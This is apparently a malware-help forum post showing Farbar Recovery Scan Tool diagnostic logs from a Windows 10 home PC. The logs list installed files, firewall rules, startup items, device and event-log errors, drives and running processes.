2010-11-22 17:57 - 2010-11-22 17:57 - 00111104 _____ () C:\Program Files (x86)\Raptr\win32file.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00044544 _____ () C:\Program Files (x86)\Raptr\_sqlite3.pyd
2011-02-15 13:17 - 2011-02-15 13:17 - 00417501 _____ () C:\Program Files (x86)\Raptr\sqlite3.dll
2010-11-22 17:57 - 2010-11-22 17:57 - 00167936 _____ () C:\Program Files (x86)\Raptr\win32gui.pyd
2014-05-13 18:26 - 2014-05-13 18:26 - 00313856 _____ () C:\Program Files (x86)\Raptr\PyQt4.QtWebKit.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00127488 _____ () C:\Program Files (x86)\Raptr\pyexpat.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00009216 _____ () C:\Program Files (x86)\Raptr\winsound.pyd
2014-08-13 19:37 - 2014-08-13 19:37 - 00113171 _____ () C:\Program Files (x86)\Raptr\libvlc.dll
2014-08-13 19:37 - 2014-08-13 19:37 - 02396691 _____ () C:\Program Files (x86)\Raptr\libvlccore.dll
2013-11-20 19:05 - 2013-11-20 19:05 - 00256000 _____ () C:\Program Files (x86)\Raptr\amd_ags.dll
2010-11-22 17:56 - 2010-11-22 17:56 - 00583680 _____ () C:\Program Files (x86)\Raptr\unicodedata.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00354304 _____ () C:\Program Files (x86)\Raptr\pythoncom26.dll
2010-11-22 17:57 - 2010-11-22 17:57 - 00263168 _____ () C:\Program Files (x86)\Raptr\win32com.shell.shell.pyd
2010-11-22 17:56 - 2010-11-22 17:56 - 00324608 _____ () C:\Program Files (x86)\Raptr\PIL._imaging.pyd
2010-11-22 17:57 - 2010-11-22 17:57 - 00024064 _____ () C:\Program Files (x86)\Raptr\win32pipe.pyd
2010-11-22 17:57 - 2010-11-22 17:57 - 00141312 _____ () C:\Program Files (x86)\Raptr\gobject._gobject.pyd
2014-06-17 19:56 - 2014-06-17 19:56 - 02717595 _____ () C:\Program Files (x86)\Raptr\heliotrope._purple.pyd
2011-02-15 13:17 - 2011-02-15 13:17 - 01213633 _____ () C:\Program Files (x86)\Raptr\libxml2-2.dll
2010-11-22 18:06 - 2010-11-22 18:06 - 00055808 _____ () C:\Program Files (x86)\Raptr\zlib1.dll
2013-05-09 18:52 - 2013-05-09 18:52 - 00495680 _____ () C:\Program Files (x86)\Raptr\plugins\libaim.dll
2013-05-09 18:52 - 2013-05-09 18:52 - 01183699 _____ () C:\Program Files (x86)\Raptr\liboscar.dll
2013-05-09 18:52 - 2013-05-09 18:52 - 00483306 _____ () C:\Program Files (x86)\Raptr\plugins\libicq.dll
2013-05-03 13:57 - 2013-05-03 13:57 - 00655356 _____ () C:\Program Files (x86)\Raptr\plugins\libirc.dll
2013-05-03 13:56 - 2013-05-03 13:56 - 01306387 _____ () C:\Program Files (x86)\Raptr\plugins\libmsn.dll
2013-05-03 13:56 - 2013-05-03 13:56 - 00565461 _____ () C:\Program Files (x86)\Raptr\plugins\libxmpp.dll
2013-05-03 13:57 - 2013-05-03 13:57 - 01640221 _____ () C:\Program Files (x86)\Raptr\libjabber.dll
2013-05-03 13:56 - 2013-05-03 13:56 - 00506276 _____ () C:\Program Files (x86)\Raptr\plugins\libyahoo.dll
2013-05-03 13:57 - 2013-05-03 13:57 - 01053730 _____ () C:\Program Files (x86)\Raptr\libymsg.dll
2013-05-03 13:57 - 2013-05-03 13:57 - 00497782 _____ () C:\Program Files (x86)\Raptr\plugins\libyahoojp.dll
2013-05-03 13:57 - 2013-05-03 13:57 - 00603326 _____ () C:\Program Files (x86)\Raptr\plugins\ssl-nss.dll
2013-05-03 13:57 - 2013-05-03 13:57 - 00474199 _____ () C:\Program Files (x86)\Raptr\plugins\ssl.dll
2010-08-18 02:46 - 2011-04-30 00:28 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2015-09-15 19:54 - 2015-09-11 19:22 - 01501512 _____ () C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\libglesv2.dll
2015-09-15 19:54 - 2015-09-11 19:22 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:0B4227B4
AlternateDataStreams: C:\ProgramData\Temp:7C3E753C
AlternateDataStreams: C:\ProgramData\Temp:AA6C7C38
AlternateDataStreams: C:\ProgramData\Temp:ABCD2B94
AlternateDataStreams: C:\ProgramData\Temp:ADE71A34
AlternateDataStreams: C:\ProgramData\Temp:F3AB0B43

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Ken Terry\Pictures\Ken's retirement pictures\couple 8x10.jpg
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\Ken Terry\Pictures\Ken's retirement pictures\couple 8x10.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: ApnUpdater => "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: NCNETWORKSDM => "C:\Program Files (x86)\NCNETWORKSDM\bin\sprtcmd.exe" /P NCNETWORKSDM

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{AFE9F478-5704-41DC-94FA-7B0026BD74BF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{86DEC5CE-656D-4E58-B812-98088CD55E6A}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{6EFE4168-CE0D-4823-97F8-5550D33CE9B3}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{293B0B75-5656-46CF-870D-A3F34818563E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{FFD77524-F52F-4631-9EC3-AA846CBFA6CE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0D626D4E-4F3D-45E1-89D4-51E8E27584E0}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization IV Colonization\Colonization.exe
FirewallRules: [{CA9F8700-15C3-4E64-884E-88B9DA3A0579}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization IV Colonization\Colonization.exe
FirewallRules: [{F5A6F06F-F11F-44D8-B648-49949E591607}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Beyond the Sword\Civ4BeyondSword.exe
FirewallRules: [{0F3FB7A0-10F2-4B13-825F-826490913B6A}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Beyond the Sword\Civ4BeyondSword.exe
FirewallRules: [{CB9B2D0A-DD48-4055-B2F5-5CEEF5CDB01B}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Warlords\Civ4Warlords.exe
FirewallRules: [{61ED1EA4-90C3-4B99-8E52-DDF64D007A1F}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Warlords\Civ4Warlords.exe
FirewallRules: [{42CD1370-E7B9-4FD4-A3A7-8DD2784959F7}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Civilization4.exe
FirewallRules: [{477A4319-A9D4-4229-8B90-1808813DEBBE}] => (Allow) C:\Program Files (x86)\2K Games\Firaxis Games\Sid Meier's Civilization 4 Complete\Civilization4.exe
FirewallRules: [{90D71A8D-B1C5-474A-9EF9-9F5229DD86E2}] => (Allow) C:\Program Files (x86)\Electronic Arts\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{BFE8BDF1-F929-4998-92F7-E6EB3DE1B73C}] => (Allow) C:\Program Files (x86)\Electronic Arts\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{0AA40B32-55AA-47A1-B68A-7CA1187C7830}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{432DF22E-27C8-4E15-80B4-482CE69603D8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{AFC6E203-E2A9-40B3-9D4C-E39BAC572185}] => (Allow) C:\Program Files (x86)\Electronic Arts\CNC and The Covert Operations\CNC95Launcher.exe
FirewallRules: [{79122C12-84E5-4F8E-8591-882F386D213D}] => (Allow) C:\Program Files (x86)\Electronic Arts\CNC and The Covert Operations\CNC95Launcher.exe
FirewallRules: [{F044B55D-1BD5-43B7-889B-757298E8D7A0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{63BF363C-A2F3-4898-8124-8E392B149665}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F23517C1-B543-42D2-91BD-C364E0EDB8B8}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS0441\hppiw.exe
FirewallRules: [{8502641D-0F94-4583-9068-6839DC6ABC76}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS0441\hppiw.exe
FirewallRules: [{2218CF0B-530B-4EF3-BA71-96D65C657BE6}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS00D9\hppiw.exe
FirewallRules: [{F520E2C6-A65F-4BEE-85EC-851903BCB255}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS00D9\hppiw.exe
FirewallRules: [{EE642384-D63C-4687-B903-F5B937A79A76}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS005D\hppiw.exe
FirewallRules: [{844908F8-D0CA-450F-821F-BFB1B70E9EFA}] => (Allow) C:\Users\Ken Terry\AppData\Local\Temp\7zS005D\hppiw.exe
FirewallRules: [{C20E561D-AC3F-468E-A224-23B57E9A807A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\sid meier's civilization v\Launcher.exe
FirewallRules: [{666E9004-D475-4239-8511-37BC23FDC5F5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\sid meier's civilization v\Launcher.exe
FirewallRules: [{EE381D13-6C4E-49D5-9FD9-823A808501BC}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{0B8B5A13-4E93-4F77-BC87-06D9319DF543}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{38C5704D-6F6E-4E27-9475-FFFF85D8A68A}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [{AFB61E77-153E-4E37-A936-A31ADE3CF92F}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [UDP Query User{7CC9ABFF-AD51-4CF6-90BA-21425D98B163}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Allow) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [TCP Query User{091A8FCB-ACC8-48F5-8649-31EAC56D1873}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Allow) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [{74B85282-D49D-4A6E-A474-93692BC210CF}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{AB6A4C6C-8DF4-4542-B631-EE56835C4409}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{0796DCBF-D5BC-4477-B90F-81D5A5EFAA62}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{73EEE2BE-EB2F-4B42-BB41-E8D42AB0B3D8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{971D3A3B-1A09-48D3-89BF-D5214FE440DF}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{0D968DC5-19C6-4A36-A40B-95B46F00EA6D}] => (Allow) C:\Windows\SysWOW64\ARFC\wrtc.exe
FirewallRules: [{D5DF5EB0-0259-44C1-99A1-6F1E8B9BF721}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [{98997453-AA80-46EE-A9CD-49397716BE70}] => (Allow) C:\Windows\System32\dmwu.exe
FirewallRules: [UDP Query User{88FFA17E-362A-4EAF-8317-299AB3674EE7}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Block) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [TCP Query User{32E2F11D-F55E-4FF5-B1E6-A73462A2D09F}C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe] => (Block) C:\program files\hp\hp officejet 6700\bin\hpnetworkcommunicator.exe
FirewallRules: [{7154E597-3D17-4541-B0C6-D618A4527188}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{C8BC4B7E-CDFE-4127-B934-A30E217E4F0B}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{443544C9-F0F8-45FF-B5ED-B42FE3C912F8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A3E863D9-3181-48BB-909D-CDCADC987046}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer:
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: 260ci WIA Driver (USB)
Description: 260ci WIA Driver (USB)
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: Kyocera
Service: usbscan
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (09/18/2015 05:04:06 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.

Error: (09/18/2015 01:34:28 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 8563

Error: (09/18/2015 01:34:28 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 8563

Error: (09/18/2015 01:34:28 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (09/18/2015 12:56:38 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.

Error: (09/18/2015 12:56:37 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.

Error: (09/18/2015 12:56:15 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.

Error: (09/18/2015 11:44:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RaMediaServer.exe, version: 0.0.0.0, time stamp: 0x4e4ce02f
Faulting module name: RaMediaServer.exe, version: 0.0.0.0, time stamp: 0x4e4ce02f
Exception code: 0xc0000005
Fault offset: 0x00025ae8
Faulting process id: 0xd08
Faulting application start time: 0xRaMediaServer.exe0
Faulting application path: RaMediaServer.exe1
Faulting module path: RaMediaServer.exe2
Report Id: RaMediaServer.exe3
Faulting package full name: RaMediaServer.exe4
Faulting package-relative application ID: RaMediaServer.exe5

Error: (09/18/2015 11:41:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MicrosoftEdge.exe, version: 11.0.10240.16431, time stamp: 0x55c9bd9e
Faulting module name: CoreUIComponents.dll, version: 0.0.0.0, time stamp: 0x55b99377
Exception code: 0xc0000005
Fault offset: 0x0000000000062459
Faulting process id: 0x1328
Faulting application start time: 0xMicrosoftEdge.exe0
Faulting application path: MicrosoftEdge.exe1
Faulting module path: MicrosoftEdge.exe2
Report Id: MicrosoftEdge.exe3
Faulting package full name: MicrosoftEdge.exe4
Faulting package-relative application ID: MicrosoftEdge.exe5

Error: (09/18/2015 11:26:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KenTerry-HP)
Description: Activation of app Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (09/18/2015 05:09:35 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Net.Tcp Listener Adapter service depends on the Net.Tcp Port Sharing Service service which failed to start because of the following error:
%%1058

Error: (09/18/2015 05:07:35 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_Session1 service to connect.

Error: (09/18/2015 05:07:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (09/18/2015 01:34:41 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 192.168.0.104 with the system
having network hardware address 18-B4-30-29-8E-BD. Network operations on this system may
be disrupted as a result.

Error: (09/18/2015 01:01:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
%%1275

Error: (09/18/2015 01:01:57 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\KENTER~1\AppData\Local\Temp\ehdrv.sys

Error: (09/18/2015 01:01:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
%%1275

Error: (09/18/2015 01:01:56 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\KENTER~1\AppData\Local\Temp\ehdrv.sys

Error: (09/18/2015 01:01:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The eapihdrv service failed to start due to the following error:
%%1275

Error: (09/18/2015 01:01:56 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\KENTER~1\AppData\Local\Temp\ehdrv.sys


CodeIntegrity:
===================================
Date: 2015-08-21 08:59:33.650
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2015-08-21 08:59:33.416
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5 CPU 650 @ 3.20GHz
Percentage of memory in use: 37%
Total physical RAM: 8119.07 MB
Available physical RAM: 5080.97 MB
Total Virtual: 8631.07 MB
Available Virtual: 4706.09 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:918.83 GB) (Free:653.14 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:12.15 GB) (Free:1.48 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 41AA0483)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=918.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=12.1 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
kfoxsr is offline  
Old 09-19-2015, 05:51 AM   #14
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:15-09-2015
Ran by Ken Terry (administrator) on KENTERRY-HP (19-09-2015 07:46:20)
Running from C:\Users\Ken Terry\Downloads
Loaded Profiles: Ken Terry & (Available Profiles: Ken Terry & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\nis.exe
(Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry64.exe
(Ralink Technology, Corp.) C:\Program Files (x86)\Ralink\Common\RaRegistry.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Reason Software Company Inc.) C:\Program Files\Reason\Security\rsEngineSvc.exe
() C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_svc.exe
(SupportSoft, Inc.) C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
() C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe
(SupportSoft, Inc.) C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\YNanoClient\cpn0\YNanoService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
() C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\nis.exe
() C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_bg.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
() C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Officejet 6700\Bin\HPNetworkCommunicator.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
() C:\Program Files (x86)\Philips\Philips SPC230NC Webcam\TrayMin230.exe
